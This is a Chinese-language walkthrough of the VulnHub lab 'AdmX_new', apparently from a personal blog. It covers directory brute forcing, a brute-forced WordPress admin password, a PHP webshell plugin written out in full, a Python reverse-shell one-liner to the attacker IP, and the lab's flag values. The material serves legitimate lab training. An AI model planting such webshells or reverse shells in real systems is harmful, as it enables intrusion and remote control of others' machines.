[VulnHub] - AdmX_new
靶机地址: https://download.vulnhub.com/admx/AdmX_new.7z
难度等级: 中
打靶目标: 取得 2 个 flag + root 权限
靶机ip:192.168.56.107
攻击ip:192.168.56.106
问题:
靶机导入virtualbox后,启动靶机,在kali上无法发现靶机的ip地址。
1.无法获取地址:
启动页面按e,进入编辑模式,并将下面位置的内容修改为rw single init=/bin/bash,同时将后面的内容删除,ctrl+x进入单一用户模式

ip add看到网卡进行修改

##配置网卡信息
vi /etc/netplan/00-installer-config.yaml

保存,重启系统。
2.主机发现

端口扫描,发现只开启了80 端口

WEB路径爆破
#安装feroxbuster
sudo apt install feroxbuster -y
#由于feroxbuster本身没有内建目录字典,需要调用seclists中的字典
sudo apt install seclists -y
#使用feroxbuster对靶机进行目录扫描,
feroxbuster --url http://10.0.2.6
#扫了100年后,发现貌似扫描到了
/tools/
/wordpress/
/wordpress/wp-content/
/wordpress/feed/
/wordpress/wp-admin/ 等多个目录
/wordpress/wp-login.php

经过一番搜寻,未曾发现主页有可用的信息

出现了wordpress,那么可以猜测这个网站是一个wordpress的cms搭建的,拼接tools访问,没有权限;凭借wordpress访问,发现的页面不像一个cms所拥有的页面,而且访问速度很慢;

发现数据包对192.168.159.145行一个访问,访问的内容都是关于wordpress的一些js文件,而192.168.159.145不存在,发现网站可能是重定向。

BurpSuite内容替换
会不会是之前在编写代码的时候,靶机的ip为192.168.159.145,但是现在靶机的ip改了,使用burp进行替换,将数据包的192.168.159.145换成192.168.56.107,需要将response响应头和请求体都替换。

3.密码爆破,Wordpress后台漏洞利用
#爆破得到用户admin密码adam14
http://192.168.56.107/wordpress/wp-login.php


4.MSF漏洞利用
我这个无法使用
5.通过插件反弹shell
写一个webshell压缩成zip的形式
<?php
/**
* Plugin Name: Webshell
* Plugin URI: https://www.cnblogs.com/23xie
* Description: WP Wehshell for Pentest
* Version: 1.0
* Author: yuanfh
* Author URI: https://www.cnblogs.com/23xie
* License: https://www.cnblogs.com/23xie
*/
if(isset($_GET['cmd']))
{
system($_GET['cmd']);
}
?>

通过搜索得知文件夹的路径是/wp-content/plugins,就此对这个页面进行拼接,http://192.168.56.107/wp-content/plugins/shell.php?cmd=id


反弹shell连接
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.106",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'

6.升级Full TTY终端
通过python反弹的shell,无法使用vi等命令对文本文件进行编辑,此时需要将shell升级成功能完整的、可以实现交互式的shell(此shell升级只适用于BASH)
先将kali主机的解释器修改为BASH,先查看当前kali的解释器是否为BASH,若不是需要修改为BASH
ctrl+z终止
CTRL+Z
stty raw -echo
fg
CTRL+Z
echo $SHELL
chsh -s /bin/bash #修改解释器为BASH#ls
reboot #修改完成后需要重启
export SHELL=/bin/bash
export TERM=screen
stty rows 38 columns 116
reset
将当前shell升级为完整的shell终端
7.蚁剑上线

7.提权
在home目录下发下了第一个txt,但是提示我们没有权限,看到了wpadmin 在之前提示我们,txt需要这个用户才能打开

同时在wp-config.php发现了数据库的用户和密码


从而得到flag和root权限

padmin@wp:~$ cat local.txt
153495edec1b606c24947b1335998bd9
root@wp:~# cat proof.txt
7efd721c8bfff2937c66235f2d0dbac1

浙公网安备 33010602011771号